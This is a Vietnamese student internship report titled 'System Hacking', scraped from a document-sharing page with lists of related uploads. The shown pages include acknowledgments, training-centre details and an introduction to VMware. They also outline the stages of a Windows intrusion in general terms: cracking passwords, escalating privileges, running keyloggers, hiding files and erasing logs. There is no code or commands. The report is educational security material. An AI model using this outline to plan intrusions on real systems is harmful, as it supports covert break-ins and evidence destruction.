luan van thac si phat hien lo hong bao mat trong mang lan
luan van thac si phat hien lo hong bao mat trong mang lanluan van thac si phat hien lo hong bao mat trong mang lan
luan van thac si phat hien lo hong bao mat trong mang lan
 
Bài 7: Xác thực và quản lý tài khoản - Giáo trình FPT
Bài 7: Xác thực và quản lý tài khoản - Giáo trình FPTBài 7: Xác thực và quản lý tài khoản - Giáo trình FPT
Bài 7: Xác thực và quản lý tài khoản - Giáo trình FPT
 
Xây Dựng Mạng LAN
Xây Dựng Mạng LANXây Dựng Mạng LAN
Xây Dựng Mạng LAN
 
Kịch bản demo phát hiện xâm nhập sử dụng snort ids
Kịch bản demo phát hiện xâm nhập sử dụng snort idsKịch bản demo phát hiện xâm nhập sử dụng snort ids
Kịch bản demo phát hiện xâm nhập sử dụng snort ids
 
Bao cao athena cuoi ky backtrack và các công cụ kiểm tra an ninh mạng -trần...
Bao cao athena cuoi ky   backtrack và các công cụ kiểm tra an ninh mạng -trần...Bao cao athena cuoi ky   backtrack và các công cụ kiểm tra an ninh mạng -trần...
Bao cao athena cuoi ky backtrack và các công cụ kiểm tra an ninh mạng -trần...
 
Gns3
Gns3Gns3
Gns3
 
Bài giảng ký thuật theo dõi giám sát mạng PTIT
Bài giảng ký thuật theo dõi giám sát mạng PTITBài giảng ký thuật theo dõi giám sát mạng PTIT
Bài giảng ký thuật theo dõi giám sát mạng PTIT
 
Báo cáo thực tập
Báo cáo thực tậpBáo cáo thực tập
Báo cáo thực tập
 

Viewers also liked

System hacking
System hackingSystem hacking
System hacking
Phuong Ngo
 
Bao cao thuc tap
Bao cao thuc tapBao cao thuc tap
Bao cao thuc tap
Phuong Ngo
 
de an system hacking
de an system hacking de an system hacking
de an system hacking Anh Bình
 
[Athena] Báo cáo thực tập - Mai Hoàng Phong
[Athena] Báo cáo thực tập - Mai Hoàng Phong[Athena] Báo cáo thực tập - Mai Hoàng Phong
[Athena] Báo cáo thực tập - Mai Hoàng Phong
Phong Hoang
 
BÁO CÁO CUỐI KÌ ĐỀ TÀI THỰC TẬP
BÁO CÁO CUỐI KÌ ĐỀ TÀI THỰC TẬPBÁO CÁO CUỐI KÌ ĐỀ TÀI THỰC TẬP
BÁO CÁO CUỐI KÌ ĐỀ TÀI THỰC TẬP
phanconghien
 
Slide Báo cáo thực tập athena
Slide Báo cáo thực tập athenaSlide Báo cáo thực tập athena
Slide Báo cáo thực tập athena
Con Ranh
 
Monitor theo doi_benh_nhan
Monitor theo doi_benh_nhanMonitor theo doi_benh_nhan
Monitor theo doi_benh_nhan
Lệnh Xung
 
Báo cáo đề tài thực tập cuối kỳ
Báo cáo đề tài thực tập cuối kỳBáo cáo đề tài thực tập cuối kỳ
Báo cáo đề tài thực tập cuối kỳthanhthong1210
 
Slide metaploit
Slide metaploitSlide metaploit
Slide metaploit
chungdv
 
chứng khoán việt nam 2000-nay
chứng khoán việt nam 2000-naychứng khoán việt nam 2000-nay
chứng khoán việt nam 2000-nayKhanh Nhi Nguyen
 
giai-phap-an-ninh-trong-kien-truc-quan-tri-mang-snmp
giai-phap-an-ninh-trong-kien-truc-quan-tri-mang-snmpgiai-phap-an-ninh-trong-kien-truc-quan-tri-mang-snmp
giai-phap-an-ninh-trong-kien-truc-quan-tri-mang-snmp
Pham Huynh
 
Nghiên cứu và hướng dẫn sử dụng bộ công cụ quét lỗ hổng hệ thống trong mạng lan
Nghiên cứu và hướng dẫn sử dụng bộ công cụ quét lỗ hổng hệ thống trong mạng lanNghiên cứu và hướng dẫn sử dụng bộ công cụ quét lỗ hổng hệ thống trong mạng lan
Nghiên cứu và hướng dẫn sử dụng bộ công cụ quét lỗ hổng hệ thống trong mạng lan
leokidd
 
Báo Cáo Thực Tập Athena - SYSTEM HACKING - DƯƠNG ĐÌNH TÚ
Báo Cáo Thực Tập Athena - SYSTEM HACKING - DƯƠNG ĐÌNH TÚBáo Cáo Thực Tập Athena - SYSTEM HACKING - DƯƠNG ĐÌNH TÚ
Báo Cáo Thực Tập Athena - SYSTEM HACKING - DƯƠNG ĐÌNH TÚ
Con Ranh
 
tìm hiểu các lỗ hổng bảo mật
tìm hiểu các lỗ hổng bảo mậttìm hiểu các lỗ hổng bảo mật
tìm hiểu các lỗ hổng bảo mật
anhkhoa2222
 

Viewers also liked (15)

Bao cao
Bao caoBao cao
Bao cao
 
System hacking
System hackingSystem hacking
System hacking
 
Bao cao thuc tap
Bao cao thuc tapBao cao thuc tap
Bao cao thuc tap
 
de an system hacking
de an system hacking de an system hacking
de an system hacking
 
[Athena] Báo cáo thực tập - Mai Hoàng Phong
[Athena] Báo cáo thực tập - Mai Hoàng Phong[Athena] Báo cáo thực tập - Mai Hoàng Phong
[Athena] Báo cáo thực tập - Mai Hoàng Phong
 
BÁO CÁO CUỐI KÌ ĐỀ TÀI THỰC TẬP
BÁO CÁO CUỐI KÌ ĐỀ TÀI THỰC TẬPBÁO CÁO CUỐI KÌ ĐỀ TÀI THỰC TẬP
BÁO CÁO CUỐI KÌ ĐỀ TÀI THỰC TẬP
 
Slide Báo cáo thực tập athena
Slide Báo cáo thực tập athenaSlide Báo cáo thực tập athena
Slide Báo cáo thực tập athena
 
Monitor theo doi_benh_nhan
Monitor theo doi_benh_nhanMonitor theo doi_benh_nhan
Monitor theo doi_benh_nhan
 
Báo cáo đề tài thực tập cuối kỳ
Báo cáo đề tài thực tập cuối kỳBáo cáo đề tài thực tập cuối kỳ
Báo cáo đề tài thực tập cuối kỳ
 
Slide metaploit
Slide metaploitSlide metaploit
Slide metaploit
 
chứng khoán việt nam 2000-nay
chứng khoán việt nam 2000-naychứng khoán việt nam 2000-nay
chứng khoán việt nam 2000-nay
 
giai-phap-an-ninh-trong-kien-truc-quan-tri-mang-snmp
giai-phap-an-ninh-trong-kien-truc-quan-tri-mang-snmpgiai-phap-an-ninh-trong-kien-truc-quan-tri-mang-snmp
giai-phap-an-ninh-trong-kien-truc-quan-tri-mang-snmp
 
Nghiên cứu và hướng dẫn sử dụng bộ công cụ quét lỗ hổng hệ thống trong mạng lan
Nghiên cứu và hướng dẫn sử dụng bộ công cụ quét lỗ hổng hệ thống trong mạng lanNghiên cứu và hướng dẫn sử dụng bộ công cụ quét lỗ hổng hệ thống trong mạng lan
Nghiên cứu và hướng dẫn sử dụng bộ công cụ quét lỗ hổng hệ thống trong mạng lan
 
Báo Cáo Thực Tập Athena - SYSTEM HACKING - DƯƠNG ĐÌNH TÚ
Báo Cáo Thực Tập Athena - SYSTEM HACKING - DƯƠNG ĐÌNH TÚBáo Cáo Thực Tập Athena - SYSTEM HACKING - DƯƠNG ĐÌNH TÚ
Báo Cáo Thực Tập Athena - SYSTEM HACKING - DƯƠNG ĐÌNH TÚ
 
tìm hiểu các lỗ hổng bảo mật
tìm hiểu các lỗ hổng bảo mậttìm hiểu các lỗ hổng bảo mật
tìm hiểu các lỗ hổng bảo mật
 

Similar to System Hacking

System hacking_Athena
System hacking_AthenaSystem hacking_Athena
System hacking_Athena
Huynh Khang
 
Baocaothuctap minhquan
Baocaothuctap minhquanBaocaothuctap minhquan
Baocaothuctap minhquan
Minh Quan
 
Triển khai hệ thống zoobies, botnet trên mạng internet
Triển khai hệ thống zoobies, botnet trên mạng internetTriển khai hệ thống zoobies, botnet trên mạng internet
Triển khai hệ thống zoobies, botnet trên mạng internet
Long Vũ
 
Baocaothuctap quan
Baocaothuctap quanBaocaothuctap quan
Baocaothuctap quan
Minh Quan
 
Bao cao cuoi ky
Bao cao cuoi kyBao cao cuoi ky
Bao cao cuoi kylehuyvinh
 
Baocao athena
Baocao athenaBaocao athena
Baocao athena
Rubelia0512
 
Báo cáo tổng kết thực tập Athena
Báo cáo tổng kết thực tập AthenaBáo cáo tổng kết thực tập Athena
Báo cáo tổng kết thực tập Athena
Nguyễn Khoa
 
Bao_cao_ttcn
Bao_cao_ttcnBao_cao_ttcn
Bao_cao_ttcn
Trung Mai
 
Nguyễn đằng vân 0943350351
Nguyễn đằng vân 0943350351Nguyễn đằng vân 0943350351
Nguyễn đằng vân 0943350351Nguyễn Vân
 
Báo cáo thực tập athena
Báo cáo thực tập athenaBáo cáo thực tập athena
Báo cáo thực tập athena
Cương Nguyêñ
 
Thuctap report
Thuctap reportThuctap report
Thuctap report
Thư Văn
 
Bao caotongd hmo
Bao caotongd hmoBao caotongd hmo
Bao caotongd hmoHồng Ân
 
Báo cáo thực tập Athena
Báo cáo thực tập AthenaBáo cáo thực tập Athena
Báo cáo thực tập Athena
Phong Nguyễn
 
Báo cáo thực tập athena
Báo cáo thực tập athenaBáo cáo thực tập athena
Báo cáo thực tập athenaMinhThien3715
 
Báo cáo thực tập kieu pham
Báo cáo thực tập  kieu phamBáo cáo thực tập  kieu pham
Báo cáo thực tập kieu phamcabietbay
 
Báo cáo cho athena
Báo cáo cho athenaBáo cáo cho athena
Báo cáo cho athenalehuyvinh
 
Báo cáo nghiên cứu và triển khai SMAC vào doanh nghiệp- Võ Lương Tàu
Báo cáo nghiên cứu và triển khai SMAC vào doanh nghiệp- Võ Lương TàuBáo cáo nghiên cứu và triển khai SMAC vào doanh nghiệp- Võ Lương Tàu
Báo cáo nghiên cứu và triển khai SMAC vào doanh nghiệp- Võ Lương Tàu
Tàu Hành
 
Báo cáo thực tập công ty ATHENA.
Báo cáo thực tập công ty ATHENA.Báo cáo thực tập công ty ATHENA.
Báo cáo thực tập công ty ATHENA.
Tân Duy
 

Similar to System Hacking (20)

System hacking_Athena
System hacking_AthenaSystem hacking_Athena
System hacking_Athena
 
Baocaothuctap minhquan
Baocaothuctap minhquanBaocaothuctap minhquan
Baocaothuctap minhquan
 
Triển khai hệ thống zoobies, botnet trên mạng internet
Triển khai hệ thống zoobies, botnet trên mạng internetTriển khai hệ thống zoobies, botnet trên mạng internet
Triển khai hệ thống zoobies, botnet trên mạng internet
 
Baocaothuctap quan
Baocaothuctap quanBaocaothuctap quan
Baocaothuctap quan
 
Bao cao cuoi ky
Bao cao cuoi kyBao cao cuoi ky
Bao cao cuoi ky
 
Baocao athena
Baocao athenaBaocao athena
Baocao athena
 
Báo cáo tổng kết thực tập Athena
Báo cáo tổng kết thực tập AthenaBáo cáo tổng kết thực tập Athena
Báo cáo tổng kết thực tập Athena
 
Bao_cao_ttcn
Bao_cao_ttcnBao_cao_ttcn
Bao_cao_ttcn
 
Nguyễn đằng vân 0943350351
Nguyễn đằng vân 0943350351Nguyễn đằng vân 0943350351
Nguyễn đằng vân 0943350351
 
Báo cáo thực tập athena
Báo cáo thực tập athenaBáo cáo thực tập athena
Báo cáo thực tập athena
 
Thuctap report
Thuctap reportThuctap report
Thuctap report
 
Bao caotongd hmo
Bao caotongd hmoBao caotongd hmo
Bao caotongd hmo
 
Báo cáo thực tập Athena
Báo cáo thực tập AthenaBáo cáo thực tập Athena
Báo cáo thực tập Athena
 
Báo cáo thực tập athena
Báo cáo thực tập athenaBáo cáo thực tập athena
Báo cáo thực tập athena
 
Báo cáo thực tập kieu pham
Báo cáo thực tập  kieu phamBáo cáo thực tập  kieu pham
Báo cáo thực tập kieu pham
 
Báo cáo cho athena
Báo cáo cho athenaBáo cáo cho athena
Báo cáo cho athena
 
Báo cáo nghiên cứu và triển khai SMAC vào doanh nghiệp- Võ Lương Tàu
Báo cáo nghiên cứu và triển khai SMAC vào doanh nghiệp- Võ Lương TàuBáo cáo nghiên cứu và triển khai SMAC vào doanh nghiệp- Võ Lương Tàu
Báo cáo nghiên cứu và triển khai SMAC vào doanh nghiệp- Võ Lương Tàu
 
Bao cao tong ket
Bao cao tong ketBao cao tong ket
Bao cao tong ket
 
Ok
OkOk
Ok
 
Báo cáo thực tập công ty ATHENA.
Báo cáo thực tập công ty ATHENA.Báo cáo thực tập công ty ATHENA.
Báo cáo thực tập công ty ATHENA.
 

System Hacking

  • 1. TRƯỜNG ĐẠI HỌC KHOA HỌC TỰ NHIÊN KHOA ĐIỆN TỬ VIỄN THÔNG - - -    - - - TRUNG TÂM ĐÀO TẠO QUẢN TRỊ MẠNG VÀ AN NINH MẠNG QUỐC TẾ ATHENA BÁO CÁO THỰC TẬP SYSTEM HACKING Giảng viên hướng dẫn: Võ Đỗ Thắng Sinh viên thực hiện : Huỳnh Minh Trí Thành phố Hồ Chí Minh
  • 2. System Hacking MỞ ĐẦU Phát tán virus đã thực sự trở thành một ngành "công nghiệp" trong hoạt động gián điệp năm 2013, như dự đoán từ đầu năm của Công ty An ninh mạng Bkav. Hoạt động gián điệp này không chỉ tồn tại ở những nước phát triển như Mỹ, Đức, Pháp… mà còn hiện hữu ngay tại Việt Nam. Trong năm qua, theo ghi nhận của Bkav, phần mềm gián điệp đã xuất hiện tại hầu hết các cơ quan quan trọng từ các cơ quan Chính phủ, Quốc hội tới Bộ Quốc phòng, Bộ Công an hay các ngân hàng, viện nghiên cứu, trường đại học… Các phần mềm gián điệp này lợi dụng lỗ hổng an ninh trong file văn bản (Word, Excel, PowerPoint) để phát tán. Cuối năm 2013, việc lợi dụng các file văn bản để cài phần mềm gián điệp đã tiến thêm một bước, không cần thông qua lỗ hổng mà chuyển sang sử dụng hình thức phishing. Trung tuần tháng 12, Bkav phát hiện một loạt các vụ tin tặc chèn mã độc vào file văn bản không sử dụng lỗ hổng. Mã độc ẩn dưới hình thức 1 ảnh thu nhỏ được nhúng trực tiếp vào file văn bản. Để đọc nội dung, chắc chắn người dùng sẽ click để mở ảnh lớn hơn, như vậy sẽ kích hoạt mã độc. Ông Ngô Tuấn Anh, Phó chủ tịch phụ trách An ninh mạng của Bkav, cho biết: “Với hình thức này, bất kỳ máy tính nào cũng sẽ bị cài phần mềm gián điệp mà không cần lỗ hổng. Phishing để cài đặt phần mềm gián điệp sẽ được sử dụng rộng rãi và sẽ là xu hướng trong năm 2014”. Bài báo cáo này sẽ giới thiệu tổng quát cơ bản về các phương pháp mà Hacker sử dụng để tấn công xâm nhập và khai thác vào các phiên bản hệ điều hành Windows, hệ điều hành phổ biến nhất hiện nay tại Việt Nam, từ đó giúp chúng ta nắm rõ cách thức mà Hacker sử dụng và đưa ra các giải pháp giúp cho người dùng được an toàn thông tin, bảo mật trong thời đại Internet ngày nay. Huỳnh Minh Trí Page 1
  • 3. System Hacking LỜI CẢM ƠN KHOA ĐIỆN TỬ VIỄN THÔNG TRƯỜNG ĐẠI HỌC KHOA HỌC TỰ NHIÊN TPHCM Em xin chân thành cảm ơn trường Đại Học Khoa Học Tự Nhiên TPHCM và khoa Điện Tử Viễn Thông đã tạo điều kiện cho em hoàn thành tốt đợt Thực Tập này. Đợt thực tập này đã cho em những kinh nghiệm quý báu. Những kinh nghiệm này sẽ giúp em hoàn thiện hơn trong công việc và môi trường làm việc sau này. Mặc dù em đã cố gắng hoàn thành báo cáo thực tập này với tất cả nỗ lực của bản thân. Nhưng do trình độ hiểu biết và kinh nghiệm thực tế có hạn nên chắc chắn không thể tránh khỏi những thiếu sót nhất định. Rất mong nhận được sự đóng góp, chia sẻ để em có thể làm tốt hơn nữa. Một lần nữa em xin chân thành cảm ơn. TPHCM, ngày 23 tháng 10 năm 2014 Sinh viên thực tập Huỳnh Minh Trí Huỳnh Minh Trí Page 2
  • 4. System Hacking LỜI CẢM ƠN TRUNG TÂM ATHENA Em xin cảm ơn giám đốc Công Ty Quản Trị và An Ninh Mạng Quốc Tế Athena, cùng các anh chị trong công ty. Đặc biệt, em xin chân thành cảm ơn thầy Đỗ Võ Thắng và thầy Lê Đình Nhân đã nhiệt tình giúp đỡ và hướng dẫn em trong thời gian thực tập tại công ty. Thầy đã tạo mọi điều kiện thuận lợi, cung cấp nhũng kiến thức cần thiết cũng như đóng góp những ý kiến quý báu để hoàn thành tốt bài báo cáo này. Em cũng xin gửi lời cám ơn đến các anh chị, bạn bè đã truyền đạt kinh nghiệm và tạo điều kiện cho em hoàn thành đề tài này. Trong quá trình thực hiện đề tài không thể không có những sai sót, mong thầy cô tại trung tâm ATHENA và các bạn thẳng thắn góp ý đề em rút kinh nghiệm trong các công trình tìm hiểu, phát triển sau này. Một lần nữa tôi xin chân thành cảm ơn. TPHCM, ngày 23 tháng 10 năm 2014 Sinh viên thực tập Huỳnh Minh Trí Huỳnh Minh Trí Page 3
  • 5. System Hacking GIỚI THIỆU CHUNG VỀ CÔNG TY THỰC TẬP Trung Tâm Đào Tạo Quản Trị Mạng & An Ninh Mạng Quốc Tế ATHENA được thành lập từ năm 2004, là một tổ chức qui tụ nhiều trí thức trẻ Việt Nam đầy năng động, nhiệt huyết và kinh nghiệm trong lãnh vực CNTT, với tâm huyết góp phần vào công cuộc thúc đẩy tiến trình đưa công nghệ thông tin là ngành kinh tế mũi nhọn, góp phần phát triển nước nhà. Lĩnh vực hoạt động chính: – Trung tâm ATHENA đã và đang tập trung chủ yếu vào đào tạo chuyên sâu quản trị mạng, an ninh mạng, thương mại điện tử theo các tiêu chuẩn quốc tế của các hãng nổi tiếng như Microsoft, Cisco, Oracle, Linux LPI , CEH,... Song song đó, trung tâm ATHENA còn có những chương trình đào tạo cao cấp dành riêng theo đơn đặt hàng của các đơn vị như Bộ Quốc Phòng, Bộ Công An , ngân hàng, doanh nghiệp, các cơ quan chính phủ, tổ chức tài chính… – Sau gần 10 năm hoạt động,nhiều học viên tốt nghiệp trung tâm ATHENA đã là chuyên gia đảm nhận công tác quản lý hệ thống mạng, an ninh mạng cho nhiều bộ ngành như Cục Công Nghệ Thông Tin - Bộ Quốc Phòng , Bộ Công An, Sở Thông Tin Truyền Thông các tỉnh, bưu điện các tỉnh,… – Ngoài chương trình đào tạo, Trung tâm ATHENA còn có nhiều chương trình hợp tác và trao đổi công nghệ với nhiều đại học lớn như đại học Bách Khoa Thành Phố Hồ Chí Minh, Học Viện An Ninh Nhân Dân (Thủ Đức), Học Viện Bưu Chính Viễn Thông, Hiệp hội an toàn thông tin (VNISA), Viện Kỹ Thuật Quân Sự... Đội ngũ giảng viên : – Tất cả các giảng viên trung tâm ATHENA có đều tốt nghiệp từ các trường đại học hàng đầu trong nước.... Tất cả giảng viên ATHENA đều phải có các chứng chỉ quốc tế như MCSA, MCSE, CCNA, CCNP, Security+, CEH, có bằng sư phạm Quốc tế (Microsoft Certified Trainer). Đây là các chứng chỉ chuyên môn Huỳnh Minh Trí Page 4
  • 6. System Hacking bắt buộc để đủ điều kiện tham gia giảng dạy tại trung tâm ATHENA – Bên cạnh đó, các giảng viên ATHENA thường đi tu nghiệp và cập nhật kiến thức công nghệ mới từ các nước tiên tiến như Mỹ , Pháp, Hà Lan, Singapore... và truyền đạt các công nghệ mới này trong các chương trình đào tạo tại trung tâm ATHENA Liên hệ: – Cơ sở 1: 92 Nguyễn Đình Chiểu, phường Đa Kao, Q1, TPHCM Điện thoại: 0907879477 0943230099 (08)38244041 Gần ngã tư Đinh Tiên Hoàng - Nguyễn Đình Chiểu – Cơ sở 2: 2 Bis Đinh Tiên Hoàng, phường Đa Kao, Q1, TPHCM Điện thoại: 0943200088 (08)22103801 Cạnh sân vận động Hoa Lư - Cách đài truyền hình Tp HTV 50 mét – Website: http://athena.edu.vn http://athena.com.vn – E-mail : support@athena.edu.vn tuvan@athena.edu.vn tuvan@athena.edu.vn Huỳnh Minh Trí Page 5
  • 7. System Hacking NHẬN XÉT CỦA KHOA ......................................................................................................................................................................................................... ................ ......................................................................................................................................................................................................... ................ .................................................................................................................................................................. ....................................................... ....................................................................................................................................................................................................... .................. ......................................................................................................................................................................................................... ................ ......................................................................................................................................................................................................................... ......................................................................................................................................................................................................................... ......................................................................................................................................................................................................... ................ ......................................................................................................................................................................................................... ................ ..................................................................................................................................................................... .................................................... ......................................................................................................................................................................................................... ................ ......................................................................................................................................................................................................................... ......................................................................................................................................................................................................... ................ ......................................................................................................................................................................................................... ................ .................................................................................................................................................................. ....................................................... ....................................................................................................................................................................................................... .................. ......................................................................................................................................................................................................... ................ ......................................................................................................................................................................................................................... ......................................................................................................................................................................................................................... ......................................................................................................................................................................................................... ................ TPHCM, ngày ... tháng ... năm 2014 Huỳnh Minh Trí Page 6
  • 8. System Hacking NHẬN XÉT CỦA TRUNG TÂM ...................................................................................................................................................................................... ................................... ......................................................................................................................................................................................................................... ......................................................................................................................................................................................................................... .................................................................................................................................................................. ....................................................... ......................................................................................................................................................................................................................... .................................................................................................................................................................. ....................................................... ......................................................................................................................................................................................................................... .................................................................................................................................................................. ....................................................... ....................................................................................................................................................................................................... .................. ......................................................................................................................................................................................................................... ......................................................................................................................................................................................................................... ......................................................................................................................................................................................................................... ......................................................................................................................................................................................................................... ......................................................................................................................................................................................................................... ..................................................................................................................................................................... .................................................... .......................................................................................................................................................................................................... ............... ......................................................................................................................................................................................................................... .................................................................................................................................................................. ....................................................... ....................................................................................................................................................................................................... .................. ......................................................................................................................................................................................................................... TPHCM, ngày ... tháng ... năm 2014 Giám đốc Huỳnh Minh Trí Page 7
  • 9. System Hacking NHẬN XÉT CỦA GIẢNG VIÊN HƯỚNG DẪN ......................................................................................................................................................................................................................... .................................................................................................................................................................. ....................................................... ....................................................................................................................................................................................................... .................. ......................................................................................................................................................................................................................... ......................................................................................................................................................................................................................... ......................................................................................................................................................................................................................... ......................................................................................................................................................................................................................... .................................................................................................................................................................. ....................................................... ....................................................................................................................................................................................................... .................. ......................................................................................................................................................................................................................... ......................................................................................................................................................................................................................... ......................................................................................................................................................................................................................... ......................................................................................................................................................................................................................... ......................................................................................................................................................................................................................... ..................................................................................................................................................................... .................................................... .......................................................................................................................................................................................................... ............... ......................................................................................................................................................................................................................... ......................................................................................................................................................................................................................... ......................................................................................................................................................................................................................... .................................................................................................................................................................. ....................................................... TPHCM, ngày ... tháng ... năm 2014 Giảng viên hướng dẫn Huỳnh Minh Trí Page 8
  • 10. System Hacking Huỳnh Minh Trí Page 9
  • 11. System Hacking Huỳnh Minh Trí Page 10
  • 12. System Hacking PHẦN 1: GIỚI THIỆU 1. System Hacking là gì ? System hacking bao gồm những kỹ thuật lấy username, password dựa vào phần mềm cài trên hệ thống hoặc tính dễ cài đặt và chạy các dịch vụ từ xa của hệ điều hành Windows. Nâng quyền trong hệ thống, sử dụng keyloger để lấy thông tin, xóa những log file hệ thống. Một khi đã xâm nhập vào hệ thống, Hacker có thể thực hiện mọi thứ trên máy tính đó, gây ra những hậu quả vô cùng nghiêm trọng cho các cá nhân, tổ chức. 2. Các lỗ hổng thường khai thác trong hệ điều hành Windows Phần mềm máy tính ngày nay vô cùng phức tạp, bao gồm hàng ngàn dòng mã. Phần mềm được viết ra bởi con người, nên cũng chẳng có gì lạ khi trong đó có chứa những lỗi lập trình, được biết đến với tên gọi lỗ hổng. Những lỗ hổng này được Hacker sử dụng để xâm nhập vào hệ thống, cũng như được tác giả của các đọan mã độc dùng để khởi động chương trình của họ một cách tự động trên máy tính của bạn. Hiện nay các lỗ hổng bảo mật được phát hiện càng nhiều trong các hệ điều hành, các Web Server hay các phần mềm khác, ... Và các hãng sản xuất luôn cập nhật các lỗ hổng và đưa ra các phiên bản mới sau khi đã vá lại các lỗ hổng của các phiên bản trước. Do đó, người sử dụng phải luôn cập nhật thông tin và nâng cấp phiên bản cũ mà mình đang sử dụng nếu không các Hacker sẽ lợi dụng điều này để tấn công vào hệ thống. Thông thường, các forum của các hãng nổi tiếng luôn cập nhật các lỗ hổng bảo mật và việc khai thác các lỗ hổng đó như thế nào thì tùy từng người. Microsoft luôn có những cải tiến an ninh vượt trội qua mỗi phiên bản mới Huỳnh Minh Trí Page 11
  • 13. System Hacking của hệ điều hành Windows. Tuy nhiên, một sự thật là các mối đe dọa mạng vẫn đang ngày càng phát triển nhanh hơn so với chu trình cập nhật và đổi mới hệ điều hành của Microsoft. Trước tiên ta sẽ tìm hiểu tổng quát một quá trình tấn công hệ thống. Mục tiêu phía trước của chúng ta là một hệ thống máy tính. Các bước để tấn công, đánh sập nó, có thể được liệt kê như hình vẽ bên cạnh. Nó gồm 6 công đoạn như sau: Quá trình tấn công vào một hệ thống – Enumerate (liệt kê): Trích ra tất cả những thông tin có thể về user trong hệ thống. Sử dụng phương pháp thăm dò SNMP để có được những thông tin hữu ích, chính xác hơn. Huỳnh Minh Trí Page 12
  • 14. System Hacking – Crack: Công đoạn này có lẽ hấp dẫn nhiều Hackernhất. Bước này yêu cầu chúng ta bẽ khóa mật khẩu đăng nhập của user. Hoặc bằng một cách nào khác, mục tiêu phải đạt tới là quyền truy cập vào hệ thống. – Escalste (leo thang): Nói cho dễ hiểu là chuyển đổi giới hạn truy cập từ user binh thường lên admin hoặc user có quyền cao hơn đủ cho chúng ta tấn công. – Execute (thực thi): Thực thi ứng dụng trên hệ thống máy đích. Chuẩn bị trước malware, keylogger, rootkit…để chạy nó trên máy tính tấn công. – Hide (ẩn file): Những file thực thi, file soucecode chạy chương trình… Cần phải được làm ẩn đi, tránh bị mục tiêu phát hiện tiêu diệt. – Tracks (dấu vết): Tất nhiên không phải là để lại dấu vết. Những thông tin có liên quan đến bạn cần phải bị xóa sạch, không để lại bất cứ thứ gì. Nếu không khả năng bạn bị phát hiện là kẻ đột nhập là rất cao. Tóm lại, quá trình tấn công hệ thống (System hacking) là bước tiếp theo sau quá trình khảo sát, thu thập thông tin của mục tiêu cần tấn công bằng những kỹ thuật như Footprinting, Social engineering, Enumeration, Google Hacking… đã được áp dụng cho mục đích truy tìm thông tin. Khi hệ thống mục tiêu đã được xác định, chúng ta bắt đầu đi vào quá trình tấn công hệ thống thật sự. Ta phải tiến hành những kỹ thuật khác nhau để làm sao vào được trong hệ thống đó, thực hiện những việc mà mình mong muốn, như xóa dữ liệu, chạy chương trình trojan, keylogger… Huỳnh Minh Trí Page 13
  • 15. System Hacking PHẦN 2: VMWARE VÀ ẢO HÓA HỆ ĐIỀU HÀNH 1. Giới thiệu VMware VMware Workstation là một phần mềm ảo hóa desktop mạnh mẽ dành cho các nhà phát triển/kiểm tra phần mềm và các chuyên gia IT cần chạy nhiều HĐH một lúc trên một máy PC. Người dùng có thể chạy các HĐH Windows, Linux, Netware hay Solaris x86 trên các máy ảo di động mà không cần phải khởi động lại hay phân vùng ổ cứng. VMware Workstation cung cấp khả năng hoạt động tuyệt vời và nhiều tính năng mới như tối ưu hóa bộ nhớ và khả năng quản lý các thiết lập nhiều lớp. Các tính năng thiết yếu như mạng ảo, chụp ảnh nhanh trực tiếp, kéo thả, chia sẻ thư mục và hỗ trợ PXE khiến VMware Workstation trở thành công cụ mạnh mẽ nhất và không thể thiếu cho các nhà doanh nghiệp phát triển tin học và các nhà quản trị hệ thống. Với hàng triệu khách hàng và hàng loạt các giải thưởng quan trọng, VMware Workstation đã được chứng minh là một công ghệ giúp tăng năng suất và sự linh họat trong công việc. Đây là một công cụ không thể thiếu cho các nhà phát triển phần mềm và các chuyên gia IT trên toàn thế giới. VMware Workstation họat động bằng cách cho phép nhiều HĐH và các ứng dụng của chúng chạy đồng thời trên một máy duy nhất. Các HĐH và ứng dụng này được tách ra vào trong các máy ảo. Những máy ảo này cùng tồn tại trên một phần cứng duy nhất. Các layer ảo của VMware sẽ kết nối các phần cứng vật lý với các máy ảo, do đó mỗi máy ảo sẽ có CPU, bộ nhớ, các ổ đĩa, thiết bị nhập/xuất riêng. Các tính năng cho người dùng: – Thiết lập và thử nghiệm các ứng dụng đa lớp, cập nhật ứng dụng và các Huỳnh Minh Trí Page 14
  • 16. System Hacking miếng vá cho HĐH chỉ trên một PC duy nhất. – Dễ dàng phục hồi và chia sẻ các môi trường thử nghiệm được lưu trữ; giảm thiểu các thiết lập trùng lặp và thời gian thiết lập. – Làm cho việc học tập trên máy tính thuận lợi hơn do sinh viên luôn đuợc sử dụng máy với tình trạng “sạch sẽ” và thử nghiệm với nhiều HĐH, ứng dụng cá các công cụ trên những máy ảo an tòan và độc lập. – Chạy các bản demo phần mềm với các thiết lập phức tạp hoặc đa lớp trên một chiếc laptop – Tăng tốc độ giải quyết các rắc rối của người dùng cuối dựa trên một thư viện các máy ảo được thiết lập sẵn Những tính năng chính: – Hỗ trợ nhiều màn hình: Bạn có thể thiết lập để một VM trải rộng ra nhiều màn hình, hoặc nhiều VM, với mỗi VM trên một màn hình riêng biệt. – Hỗ trợ các thiết bị USB 2.0: Bây giờ bạn đã có thể sử dụng các thiết bị ngọai vi yêu cầu tốc độ làm việc cao trên VM, như máy MP3 và các thiết bị lưu trữ di động khác – VM Record/Replay: Bạn có thể sử dụng tính năng này để thu lại các hoạt động của VM và được đảm bảo là sẽ tái lập lại tình trạng của VM chính xác 100%. – Integrated Virtual Debugger: Workstation được tích hợp Visual Studio và Eclipse nên bạn có thể trực tiếp sử dụng, chạy và vá các lỗ hổng của các chương trình trong một VM từ một IDE yêu thích – Automation APIs (VIX API 2.0): Bạn có thể viết script hay chương trình để Huỳnh Minh Trí Page 15
